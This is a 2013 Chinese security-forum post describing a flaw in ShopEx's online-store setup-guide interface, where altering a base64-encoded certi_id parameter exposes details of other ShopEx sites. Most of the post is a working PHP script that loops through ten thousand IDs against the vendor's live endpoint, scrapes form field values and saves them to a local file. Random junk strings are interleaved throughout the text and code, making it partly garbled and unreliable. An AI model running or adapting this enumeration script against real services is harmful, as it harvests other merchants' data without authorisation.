找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2653|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
2 D4 s( i. c3 _  NShopEx某接口缺陷,可遍历所有网站
% \2 t% U5 K' A8 ?详细说明:- m% K$ O# J) S) H. r
问题出现在shopex 网店使用向导页面 * i4 N3 ?; {; N3 [! m2 W. j, @
# O) M) ~% |  t% E4 S  g0 Z6 o) }
) ?1 d3 g, q# @4 o+ S$ P
" r& Z  b( Z7 w$ x
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
  X6 g( V! N! C1 i) d# g9 Q$ o  z
; g' V/ y8 Z6 D* U: U/ s* I, m$ ~# m8 s4 x' \

  ~$ U* ~$ F" i+ V0 Drefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
0 x" P5 B  S8 G3 ~. U" P6 f4 s& \' F2 D0 j! ]8 J( s
; J9 M; g2 N( ]3 l' ?7 V8 O4 D. j

+ m9 Y+ K8 x) p" B我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
9 a1 F9 @: g  C* a  ?# m) l! h; g' F( W) {2 ?9 C* L

4 R! y% R- |; `8 Z, ]+ \4 D  M5 ]: b
<?php. u/ q$ d) @( U8 R1 X
0 `: C4 i2 ~# I" g) g  E
                for ($i=1; $i < 10000; $i++) { //遍历
; B7 [' r2 P  h1 r: f
/ m' U3 f7 l. L, A) T# M                        ShowshopExD($i);
! {0 v! {8 U0 p$ O$ Z0 _8 C& ]
- L( [/ a& a2 T1 S3 v* Z7 @3 @. K$ \                }* G. b( z# M. i

6 M0 ~! u3 z) g* ~) W; D- [                function ShowshopExD($cid) {9 S; G1 \) ^) p0 X

6 H/ L) K* v, l: a                $url='http://guide.ecos.shopex.cn/step2.php';
  L) j+ K. h. w0 P
1 O- ~7 c7 H5 P6 P' x* O1 U! s                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');7 m/ M* f3 `1 C4 L2 O9 o

2 \' b! {, j2 _8 ]8 T, J        $url = $url.'?refer='.$refer;2 g# V$ f2 U2 V' l' W; \
& }  U9 k9 X0 J" z! h
        $ch = curl_init($url);
1 T" B* i/ U7 u- X" [2 B' f- ^$ d* H* D9 s* N4 P
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;2 Z" h) p3 r6 i1 E" M( `+ N

! B8 t" u9 T" P6 _. l        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;3 p: f8 c5 _& B" r8 Q+ V

* I. s! M9 {0 t9 O+ K7 \        $result = curl_exec($ch);8 f5 \7 a: m( n' P' E

9 T* ~4 h- f1 X5 j        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
- G3 c2 P7 @8 |6 g# g! U/ e% c, h: R7 R$ h8 E9 {$ I
        if(strpos($result,$refer))
5 A, Z0 ~) t2 o: W
5 G- [& X$ N8 i9 b4 [        {
% e) _2 `% z5 w# z" E; d" f2 h1 u- D6 I
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件4 W( x& O% V0 J! {* D- e/ a% X3 L

9 D% a) S8 s/ w6 E. \3 q" C4 U                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);9 p- I+ u7 @$ a

* q3 W  l4 e/ U/ `( Y3 p                foreach ($value[1] as $key) {' `5 B* [& z4 r' s  B( ]% F5 N( N
' y9 Z5 @0 O" D! w
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);, ~' X7 v& A* r( ^$ J* K
1 q8 f2 L* u, R; G/ T
                        echo $res[1][0].':'.$res[3][0]."\r\n";
8 O- ~: h: S7 M# J: @1 M/ P( \( U; O7 ]% \) j/ |
                        $col =$res[1][0].':'.$res[3][0]."\r\n"; 3 F1 K5 ^0 k1 @* d6 O& }5 ]

& ^* L: B* D4 j& a                        fwrite($fp, $col, strlen($col)); 4 n* U7 [2 \& S8 U& Z& F7 d; Z- I
/ B& b9 E& E( P
                }0 J/ r* `4 M2 E# e' d( B
# g! Y) M* H5 u+ Q
                echo '--------------------------------'."\r\n";( N4 Y3 z/ r0 z6 _( T% K1 `9 h, [
& u% N% b9 p5 d
                fclose($fp); 0 N% ?& a6 Q% _! M: @

5 A; ]. a3 s' |. h  t        }" {6 D6 @! @  J7 Q' E; r7 @4 x
( g- P/ M5 I2 q; {
        flush();
9 y" \5 ~* C) O/ P- I5 D- Z
5 S9 V. b3 G8 {        curl_close($ch);
/ U% ^8 M2 g7 L1 A# L) \1 [& H
                }0 S$ s) Y2 e% [/ ], L! P# v. W

4 C+ Y2 }# y) t( d9 z# E( \. W: |?>
- M& _- {. u0 h1 I" l漏洞证明:- p2 [" C# U* O  c7 e2 T
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg/ S' {2 `9 H* t
refer换成其他加密方式* F2 I7 c% S2 h* d1 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表